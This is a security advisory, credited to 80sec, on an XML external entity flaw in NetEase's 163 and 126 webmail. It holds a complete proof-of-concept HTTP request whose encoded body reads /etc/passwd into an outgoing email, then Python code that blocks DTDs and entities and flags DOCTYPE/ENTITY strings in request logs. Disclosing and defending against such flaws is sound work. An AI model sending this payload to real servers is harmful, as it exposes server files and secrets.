Brief description: the 163 Mail and 126 Mail implementations contain a defect. The XML parsing vulnerability disclosed by 80sec allows an attacker to read arbitrary files on the server, including server configuration files and sensitive database files; combined with the application's own logic, higher privileges may be obtainable.
Details: 163's servers use the XML format for data transmission when accepting and passing parameters. However, according to the 80sec security notice, if the server's XML parser is misconfigured when processing this XML data (external entities are resolved), a security vulnerability results: the attacker can read any file's contents with the application's context permissions and use the application's logic to obtain more privileges.
Proof of vulnerability: the trick is simply to add a malicious declaration to the XML header.
POST /js4/s?sid=jaznlakzh1_sfgyiazzsbdowpsmytth&func=mbox:compose&l=compose&action=deliver HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/javascript
Referer: http://twebmail.mail.163.com/js4/index.jsp?sid=jaznlakzh1_sfgyiazzsbdowpsmytth
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET4.0C; .NET4.0E)
Host: twebmail.mail.163.com
Content-Length: 1348
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: it's a secret

var=%3C%3Fxml+version%3D%221.0%22%3F%3E%3C%21DOCTYPE+copyright+%5B%3C%21ENTITY+hi80sec+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cobject%3E%3Cstring+name%3D%22id%22%3Ec%3A1320845207002%3C%2Fstring%3E%3Cobject+name%3D%22attrs%22%3E%3Cstring+name%3D%22account%22%3E%22Hi%22%26lt%3Bfukhaha%40163.com%26gt%3B%3C%2Fstring%3E%3Cboolean+name%3D%22showOneRcpt%22%3Efalse%3C%2Fboolean%3E%3Carray+name%3D%22to%22%3E%3Cstring%3E%22fukhaha%40163.com%22%26lt%3Bfukhaha%40163.com%26gt%3B%3C%2Fstring%3E%3C%2Farray%3E%3Carray+name%3D%22cc%22%2F%3E%3Carray+name%3D%22bcc%22%2F%3E%3Cstring+name%3D%22subject%22%3Eshow+me+the+%2Fetc%2Fpasswd%3C%2Fstring%3E%3Cboolean+name%3D%22isHtml%22%3Etrue%3C%2Fboolean%3E%3Cstring+name%3D%22content%22%3E%26lt%3Bdiv+style%3D%27line-height%3A1.7%3Bcolor%3A%23000000%3Bfont-size%3A14px%3Bfont-family%3Aarial%27%26gt%3B%26lt%3BDIV%26gt%3B%26hi80sec%3B%26lt%3B%2FDIV%26gt%3B%26lt%3B%2Fdiv%26gt%3B%3C%2Fstring%3E%3Cint+name%3D%22priority%22%3E3%3C%2Fint%3E%3Cboolean+name%3D%22saveSentCopy%22%3Etrue%3C%2Fboolean%3E%3Cboolean+name%3D%22requestreadreceept%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22charset%22%3EGBK%3C%2Fstring%3E%3C%2Fobject%3E%3Cboolean+name%3D%22returnInfo%22%3Efalse%3C%2Fboolean%3E%3Cstring+name%3D%22action%22%3Edeliver%3C%2Fstring%3E%3Cint+name%3D%22saveSentLimit%22%3E1%3C%2Fint%3E%3C%2Fobject%3E
Solution: modify the XML parser on the server so that external entities are not resolved.
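As an added illustration of the defect and of the fix (this is example code written for this page, not 80sec's proof-of-concept or NetEase's server code), the following Python shows how a server should handle a form body shaped like the request above: it pulls the XML out of the form field (assumed here to be called var, as in the request), refuses any DOCTYPE or entity declaration instead of letting the parser fetch a SYSTEM entity, and also provides a cheap pre-parse check suitable for scanning request logs. The sample bodies, the entity name and the file path in them are constructed for the example.

```python
import urllib.parse
import xml.parsers.expat as expat

# Constructed samples in the shape of the "var" form field: a URL-encoded XML
# message object. The entity name and the file:// path are placeholders, not
# values taken from the original request.
HOSTILE_BODY = "var=" + urllib.parse.quote_plus(
    '<?xml version="1.0"?>'
    '<!DOCTYPE copyright [<!ENTITY ext SYSTEM "file:///placeholder/path">]>'
    '<object><string name="subject">&ext;</string></object>'
)
BENIGN_BODY = "var=" + urllib.parse.quote_plus(
    '<?xml version="1.0"?>'
    '<object><string name="subject">hello</string>'
    '<boolean name="isHtml">false</boolean></object>'
)


class UnsafeXml(ValueError):
    """Raised when inbound XML carries a DTD or an entity declaration."""


def decode_var(form_body):
    """Extract the XML text from an application/x-www-form-urlencoded body."""
    return urllib.parse.parse_qs(form_body).get("var", [""])[0]


def looks_like_xxe(xml_text):
    """Pre-parse / log-scan check: a client-built message object never needs a
    DTD, so any DOCTYPE or ENTITY declaration in it is worth flagging."""
    lowered = xml_text.lower()
    return "<!doctype" in lowered or "<!entity" in lowered


def parse_message_xml(xml_text):
    """Parse the message object with DTDs and external entities disabled.

    Returns a dict mapping each <string name="..."> element to its text. The
    vulnerable server let the parser resolve the SYSTEM entity and inlined the
    file into the message; here every such declaration aborts the parse.
    """
    fields = {}
    current = {"name": None, "buf": []}

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXml("DOCTYPE declaration not allowed: %s" % doctype_name)

    def reject_entity(name, is_parameter, value, base, system_id, public_id, notation):
        raise UnsafeXml("entity declaration not allowed: %s" % name)

    def refuse_external(context, base, system_id, public_id):
        return 0  # returning 0 makes expat abort instead of opening system_id

    def start(tag, attrs):
        if tag == "string":
            current["name"] = attrs.get("name")
            current["buf"] = []

    def chars(data):
        if current["name"] is not None:
            current["buf"].append(data)

    def end(tag):
        if tag == "string" and current["name"] is not None:
            fields[current["name"]] = "".join(current["buf"])
            current["name"] = None

    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = refuse_external
    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(xml_text, True)
    return fields


def handle_compose_body(form_body):
    """Server-side entry point: ('ok', fields) or ('rejected', reason)."""
    xml_text = decode_var(form_body)
    try:
        return ("ok", parse_message_xml(xml_text))
    except UnsafeXml as exc:
        return ("rejected", str(exc))
    except expat.ExpatError as exc:
        return ("rejected", "malformed XML: %s" % exc)


if __name__ == "__main__":
    print(handle_compose_body(BENIGN_BODY))
    print(handle_compose_body(HOSTILE_BODY))
    print("hostile flagged:", looks_like_xxe(decode_var(HOSTILE_BODY)))
```

The parser-level handlers are the actual fix; the same three settings exist in one form or another in every mainstream XML library (for the JAXP parsers behind a .jsp front end, the equivalent is disallowing the doctype-decl feature and the external general/parameter entity features). looks_like_xxe is a complementary detection signal for a WAF rule or a search over stored request bodies, not a substitute for the parser configuration.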
Source: 80sec